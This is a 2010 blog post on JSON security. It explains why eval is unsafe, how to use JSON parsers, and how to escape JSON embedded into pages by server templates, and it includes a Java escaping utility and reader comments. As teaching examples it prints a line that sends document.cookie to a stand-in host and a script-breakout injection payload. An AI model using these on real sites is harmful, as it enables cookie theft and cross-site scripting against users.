Saturday, September 18, 2010

JSON parsing, encoding, and security

JSON is a subset of JavaScript. Unlike other data formats such as XML, JSON can be used in JavaScript with very little effort. This is the main reason why JSON is so popular among web developers.

A JSON string such as '{"name": "David"}' can be passed to the eval function. eval invokes the JavaScript interpreter and converts the string into a JavaScript object: {name: 'David'}.

var jsonStr = '{"name": "David"}';
var jsonObj = eval( "(" + jsonStr + ")" );
// jsonObj will be {name: 'David'}

This all looks easy. However, here is the problem: eval will execute whatever is passed in. If jsonStr is "alert('Gotcha');", eval("alert('Gotcha');") will actually execute the alert call. This opens the door wide to cross-site scripting (XSS) attacks. For example, consider the following string passed to eval:

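// The string is built by concatenation because a quoted JavaScript
// string cannot span several lines.
eval(
  '(new Image()).src = ' +
  '"http://www.givemeyourcookie.com/steal_cookie?cookie=" + ' +
  'escape(document.cookie);'
);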

The above code will send your cookie to givemeyourcookie.com.
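
The same effect can be seen without touching real cookies. The following is a harmless sketch, not an attack: the visited array and the payload string are made up for illustration, and the payload only records that it ran.

```javascript
// Hypothetical stand-in for a side effect such as sending a cookie.
var visited = [];

// A string that looks like data but carries a function call in front of it.
var payload = "visited.push('payload ran'), {\"name\": \"David\"}";

// Wrapping the string in parentheses does not help: the call still runs.
var result = eval("(" + payload + ")");
```

After this runs, result holds the object, and visited shows that the embedded call was executed along the way.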

To fix this vulnerability, it is recommended to use a JSON parser to convert strings into JSON objects. In browsers that provide native JSON support, the parser can even be faster than the eval function.

Like the eval function, a JSON parser takes a string and outputs a JSON object. The difference is that the parser accepts the string only if it is valid JSON. For example, the JSON parser from the YUI JavaScript library will throw a SyntaxError if the string contains anything that violates JSON syntax.

var jsonStr = 'alert("Gotcha"); {"name" : "David"}';
var jsonObj = YAHOO.lang.JSON.parse(jsonStr); // SyntaxError

With a correct JSON string, the following code will run.

var jsonStr = '{"name" : "David"}';
var jsonObj = YAHOO.lang.JSON.parse(jsonStr);
alert(jsonObj.name); // Displays "David"
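
In browsers with native JSON support, the built-in JSON.parse behaves the same way. The following is a minimal sketch assuming such an environment; tryParse is a hypothetical helper name, not part of YUI or of the language.

```javascript
// Hypothetical helper: returns the parsed value, or null when the input
// is not valid JSON. (A real helper would need another way to signal
// failure, because the JSON text "null" also parses to null.)
function tryParse(jsonStr) {
  try {
    return JSON.parse(jsonStr);
  } catch (e) {
    if (e instanceof SyntaxError) {
      return null; // Invalid JSON is rejected, never executed.
    }
    throw e;
  }
}

var good = tryParse('{"name" : "David"}');
var bad = tryParse('alert("Gotcha"); {"name" : "David"}');
```

Here good is the parsed object, while bad is null because the parser refused the input instead of running it.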

Using a JSON parser certainly solves the eval problem. However, this is only half of the story. We web developers usually use a server-side technology such as PHP or JSP to embed dynamic content into a page. When we do that, we need to be careful about what we embed.

<script type="text/javascript">
  var jsonObj = 
    YAHOO.lang.JSON.parse('<s:property value="userProfile" />');
</script>

<s:property> is a tag from Struts 2 (a popular Java MVC framework). It retrieves a property, in this case a string representation of userProfile, and writes it between a pair of single quotes to form a JavaScript string. The parse function then converts this string into a JSON object.

This will work fine if the userProfile property is a normal user profile:

<script type="text/javascript">
  // userProfile property is { "name": "David", "hobby": "Blogging" }. 
  var jsonObj = 
    YAHOO.lang.JSON.parse('{ "name": "David", "hobby": "Blogging" }');
</script>

However, the code will break if the userProfile property is:

{ "name": "David", "hobby": "Blogging in Peet's Coffee" }

The single quote in "Blogging in Peet's Coffee" will prematurely terminate the string, which breaks the JavaScript syntax.

<script type="text/javascript">
  // { "name": "David", "hobby": "Blogging in Peet's Coffee" }. 
  var jsonObj = YAHOO.lang.JSON.parse(
    '{ "name": "David", "hobby": "Blogging in Peet' // Broken
    s Coffee" }');
</script>
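
The breakage can be reproduced without a server. This sketch assumes the template simply pastes the property between single quotes. renderCall and runGenerated are hypothetical helpers, and the native JSON.parse stands in for the YUI parser. new Function is used only to ask the JavaScript engine whether the generated code compiles.

```javascript
// Hypothetical stand-in for the server-side template: pastes the raw
// property between single quotes.
function renderCall(userProfile) {
  return "return JSON.parse('" + userProfile + "');";
}

// Compiles and runs the generated code, reporting errors instead of throwing.
function runGenerated(code) {
  try {
    return { ok: true, value: new Function(code)() };
  } catch (e) {
    return { ok: false, error: e.name };
  }
}

var plain = runGenerated(
  renderCall('{ "name": "David", "hobby": "Blogging" }'));
var quoted = runGenerated(
  renderCall('{ "name": "David", "hobby": "Blogging in Peet\'s Coffee" }'));
```

The first profile parses normally. The second never reaches the parser: the generated code itself fails to compile, so quoted.error is "SyntaxError".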

Things could be even worse when userProfile is something like this:

{ "name": "David", "hobby": ""}');alert("Evil script goes here");</script>"}

Pass this property to the parse function, and you will get:

<script type="text/javascript">
  var jsonObj = YAHOO.lang.JSON.parse(
    '{ "name": "David", "hobby": ""}');alert("Evil script goes here");</script>"}');
</script>

This is equivalent to:

<script type="text/javascript">
  var jsonObj = YAHOO.lang.JSON.parse('{ "name": "David", "hobby": ""}');
  alert("Evil script goes here");
</script>
"}');
</script>

The above code will run even though the second </script> tag has no matching <script> tag. It's pretty scary that a raw JSON string could introduce such an XSS attack into your web application, isn't it?
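
The same naive embedding can be exercised in plain JavaScript. This is a sketch under assumptions: embedNaively is a hypothetical stand-in for the template, and the payload is a simplified variant of the one above. There is no HTML parser involved here, so it closes the string literal rather than the script element, and it flips a flag instead of calling alert.

```javascript
// Hypothetical stand-in for the template: no escaping at all.
function embedNaively(userProfile) {
  return "var jsonObj = JSON.parse('" + userProfile + "');";
}

// Attacker-controlled value: closes the string and the call, then adds
// a statement of its own.
var maliciousProfile =
  '{ "name": "David", "hobby": "" }\'); state.hijacked = true; (\'';

var state = { hijacked: false };
var generated = embedNaively(maliciousProfile);

// Run the generated code the way a script block would, passing state in.
new Function("state", generated)(state);
```

The JSON parser sees only well-formed JSON and raises no error, yet state.hijacked ends up true: the injected statement ran next to the parse call, not inside it.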

To fix the problem, we need to escape the single quote. We can use the Unicode escape \u0027, which is equivalent to the ' character.

<script type="text/javascript">
  var jsonObj = YAHOO.lang.JSON.parse(
      '{ "name": "David", "hobby": "Blogging in Peet\u0027s Coffee" }');
</script>

In the real world, all user input and database data must be escaped for JavaScript strings if it is embedded directly into JavaScript or event handler attributes (e.g. onclick). The single quote is just one of the characters that we need to escape. Here is a list of such characters and their escapes.

Character   Escape   Description
\           \\       Backslash
"           \u0022   Double quote
'           \u0027   Single quote
<           \u003c   Less than
>           \u003e   Greater than
=           \u003d   Equals
&           \u0026   Ampersand

I created a Java utility class to escape all these characters. The essential part looks like this:

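// Imports needed at the top of the file
import java.util.LinkedHashMap;
import java.util.Map;

// A map of characters and their escapes, kept in insertion order
private static final Map<String, String> _mapChar2Escape = 
  new LinkedHashMap<String, String>();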

static
{
  // The backslash must come first. Otherwise the backslashes introduced
  // by the other escapes would themselves be escaped again.
  _mapChar2Escape.put("\\", "\\\\");    // Backslash
  _mapChar2Escape.put("\"", "\\u0022"); // Double quote
  _mapChar2Escape.put("'", "\\u0027");  // Single quote
  _mapChar2Escape.put("&", "\\u0026");  // Ampersand
  _mapChar2Escape.put("<", "\\u003c");  // Less than
  _mapChar2Escape.put(">", "\\u003e");  // Greater than
  _mapChar2Escape.put("=", "\\u003d");  // Equals
}

/**
 * Returns a new string in which the characters that are unsafe inside
 * a JavaScript string literal are escaped.
 * 
 * @param strSource Source string
 * @return the escaped copy of strSource
 */
public static String escapeJavaScript(String strSource)
{
  String strEscaped = strSource;

  for (Map.Entry<String, String> entry : _mapChar2Escape.entrySet())
  {
    strEscaped = strEscaped.replace(entry.getKey(), entry.getValue());
  }

  return strEscaped;
}
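
For comparison, here is a rough JavaScript counterpart of the same idea, followed by a round trip. It is only a sketch: the ESCAPES name and the JavaScript port are assumptions made for illustration, and new Function stands in for the browser evaluating the generated script block.

```javascript
// Character/escape pairs from the table above. The backslash comes first
// so that backslashes introduced by later escapes are not escaped again.
var ESCAPES = [
  ["\\", "\\\\"],
  ['"', "\\u0022"],
  ["'", "\\u0027"],
  ["&", "\\u0026"],
  ["<", "\\u003c"],
  [">", "\\u003e"],
  ["=", "\\u003d"]
];

// Hypothetical JavaScript counterpart of the Java escapeJavaScript method.
function escapeJavaScript(source) {
  var escaped = source;
  for (var i = 0; i < ESCAPES.length; i++) {
    // split/join replaces every occurrence, like Java's String.replace.
    escaped = escaped.split(ESCAPES[i][0]).join(ESCAPES[i][1]);
  }
  return escaped;
}

var profile = '{ "name": "David", "hobby": "Blogging in Peet\'s Coffee" }';
var escapedProfile = escapeJavaScript(profile);

// Embed the escaped text in a single-quoted literal and let the engine
// decode it, as the browser would for the generated script block.
var decoded = new Function("return '" + escapedProfile + "';")();
var parsed = JSON.parse(decoded);
```

The engine turns the escapes back into the original characters, so decoded equals profile and the parser receives the JSON text unchanged. Raw line breaks in the source string are not in the table above and are not handled by this sketch.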

That's it.

5 comments:

  1. In escapeJavaScript(), why do you need to declare String strEscaped = strSource?

  2. Because the String.replace method won't change the passed-in string, and it is not recommended to reassign the strSource input argument. A method/function should have no side effects.

  3. Excellent post, David.
    Katelyn is right though, strSource would not be affected outside the function even if you did

    strSource="haha side effects";

    because strings are immutable in Java

    not that it matters! I just like splitting hairs.

  4. Yes, you both are right.

    I guess the coding policy in Eclipse won't allow me to re-assign values to arguments. I have a set of customized policies. Kinda restrictive. In most cases, this policy enforces a good practice. Well, in most cases.

    Thanks.

  5. I very much enjoyed this article. Nice article, thanks for giving this information. I hope it is useful to many people.
